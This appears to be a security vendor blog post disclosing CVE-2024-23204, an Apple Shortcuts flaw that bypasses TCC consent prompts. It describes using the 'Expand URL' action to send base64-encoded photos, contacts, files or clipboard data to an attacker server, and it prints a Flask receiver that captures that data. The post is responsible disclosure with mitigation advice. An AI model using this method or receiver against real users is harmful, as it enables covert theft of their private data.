Details on Apple’s Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204

Jubaer Alnazi JABIN

February 22, 2024

Promo Protect all your devices, without slowing them down.
Free 30-day trial
Details on Apple’s Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204

CVE-2024-23204 sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures.

At a glance:

  • We have discovered a vulnerability in Apple Shortcuts that lets a potential attacker access sensitive data with certain actions without prompting the user;
  • The vulnerability is rated 7.5 out of 10 and affects Mac OS and iOS devices running v ersions prior to macOS Sonoma 14.3 and versions prior to iOS 17.3 and iPadOS 17.3, respectively.
  • The vulnerability was responsibly disclosed and is now fixed. Software updates have been made avalaible for impacted users.

What is Apple Shortcuts?

Apple Shortcuts is a powerful automation app designed for macOS and iOS devices, enabling users to create personalized workflows to streamline tasks and enhance productivity. With an intuitive interface, Shortcuts allows users to automate a wide range of actions, from simple tasks like sending messages to complex operations involving multiple applications. Leveraging a visual programming approach, users can combine various pre-built and custom actions to create intricate sequences tailored to their needs.

What can these Shortcuts do?


Apple Shortcuts serves a multitude of purposes, enabling users to streamline tasks on macOS and iOS devices. It allows for the automation of various actions, from quick app tasks and device control to media management, messaging, and location-based actions. Users can create workflows for file management, health and fitness tracking, web automation, education, and even smart home integration. Shortcuts offer a flexible and customizable way to enhance productivity, making routine tasks quicker and more efficient. Whether it's automating daily chores or facilitating specific device functionalities, Shortcuts cater to a diverse range of user preferences, providing a seamless and personalized experience on Apple devices.

The flexibility and customization offered by Shortcuts make it a versatile tool that caters to a wide range of user preferences and needs, enhancing the overall efficiency and user experience on Apple devices.

Now that we have a comprehensive understanding of Shortcuts, let's delve into the impact of CVE-2024-23204. Shortcuts are distributed through various channels, and Apple has its gallery where users can discover automation workflows to expedite tasks. Furthermore, Shortcuts can be exported and shared among users, a common practice in the Shortcuts community. This sharing mechanism extends the potential reach of the vulnerability, as users unknowingly import shortcuts that might exploit CVE-2024-23204. With Shortcuts being a widely used feature for efficient task management, the vulnerability raises concerns about the inadvertent dissemination of malicious shortcuts through diverse sharing platforms.

For CVE-2024-23204 it was possible to craft a Shortcuts file that would be able to bypass the TCC. TCC, or Transparency, Consent, and Control, is a security framework in Apple's macOS and iOS that governs access to sensitive user data and system resources by applications. TCC ensures that apps explicitly request permission from the user before accessing certain data or functionalities, enhancing user privacy and security.

Typically, the com.apple.WorkflowKit.BackgroundShortcutRunner is associated with executing Shortcuts in the background on Apple devices. TCC (Transparency, Consent, and Control) prompts are designed to appear when an app or a process attempts to access sensitive user data or system resources. During the analysis of the vulnerability, it was assumed that com.apple.WorkflowKit.BackgroundShortcutRunner was able to access some sensitive data even though the profile was within the sandbox.

How does the attack work?

To delve into the details of this vulnerability, the following steps outline the process to reproduce the issue:

The 'Expand URL' function was the pivotal element that allowed the shortcut to bypass TCC. By leveraging this functionality, it became possible to transmit the base64-encoded data of a photo to a malicious website. The method involves selecting any sensitive data (Photos, Contacts, Files and Clipboard Data) within Shortcuts, importing it, converting it using the base64 encode option, and ultimately forwarding it to the malicious server.

To capture and save the base64 data as an image on the attacker's end, a Flask program is employed. This program effectively captures the transmitted data, enabling the attacker to collect and store the sensitive information for potential exploitation. This nuanced approach highlights the intricate nature of the vulnerability, emphasizing the need for robust security measures to safeguard against such exploits.

This is what the attack looks like on the user's end after they install the malicious shortcut:

# Endpoint to receive and save Base64-encoded image, overwriting the existing file 
@app.route('/', methods=['GET']) 
def upload_image(): 
    # Get the Base64-encoded image from the query parameter named 'image' 
    encoded_image = request.args.get('image', '') 
    if not encoded_image: 
        return "No image data provided." 
    try: 
        # Replace spaces with '+' characters in the Base64 data 
        encoded_image = replace_spaces_with_plus(encoded_image) 
        # Check if the provided data is a valid Base64 string 
        if not is_base64(encoded_image): 
            return "Invalid Base64 image data." 
        # Generate the filename for the text file (you may want to implement a more robust naming strategy) 
        text_filename = os.path.join(TEXT_FILES_FOLDER, 'base64_image.txt') 
        # Save the Base64 data to the specified text file, overwriting any existing file 
        with open(text_filename, 'w') as text_file: 
            text_file.write(encoded_image) 
        return "Base64 image data saved to a text file." 
    except Exception as e: 
        return f"Error saving Base64 image data: {str(e)}" 

This vulnerability has received 7.5 in CVSS score making it a very high severity vulnerability.

Mitigation

To safeguard against this vulnerability, users are strongly advised to:

  • Update their macOS, ipadOS and watchOS devices to the latest versions.
  • Exercise caution when executing shortcuts from untrusted sources.
  • Regularly check for security updates and patches from Apple.

Apple Advisory:


Apple has assigned CVE-2024-23204 to this issue. CVEs are unique IDs used to uniquely identify vulnerabilites. The following describes the impact and description of this issue:

Impact: A shortcut may be able to use sensitive data with certain actions without prompting the user

Description: The issue was addressed with additional permissions checks.

https://support.apple.com/HT214060

https://support.apple.com/HT214059

https://support.apple.com/HT214061

tags


Author


Jubaer Alnazi JABIN

Jubaer holds a reputation in the fields of information and cloud security. With over 5 years of experience in penetration testing, his exploits include the discovery of multiple Apple vulnerabilities.

View all posts

You might also like

Bookmarks


loader